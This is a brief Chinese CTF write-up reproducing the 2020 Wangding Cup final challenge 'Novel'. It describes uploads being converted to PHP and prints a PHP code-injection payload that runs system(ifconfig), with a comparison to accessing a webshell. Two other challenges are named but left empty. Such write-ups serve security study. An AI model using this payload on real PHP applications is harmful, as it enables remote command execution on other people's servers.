2020年网鼎杯总决赛复现

[网鼎杯 2020 总决赛]Novel

上传,备份的时候转为了php。

echo ${eval(eval(system(ifconfig)))};

php > echo ${eval(system(ifconfig))};

上传时的请求包:

image-20201206003951631

私藏的请求包:

image-20201206003933467

带上密码去访问,有点想访问webshell的感觉。只不过这里相当于有两个密码。

[网鼎杯 2020 总决赛]Game Exp

[网鼎杯 2020 总决赛]Vulnfaces

Author: m0nk3y
Link: https://hack-for.fun/d3b1.html
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.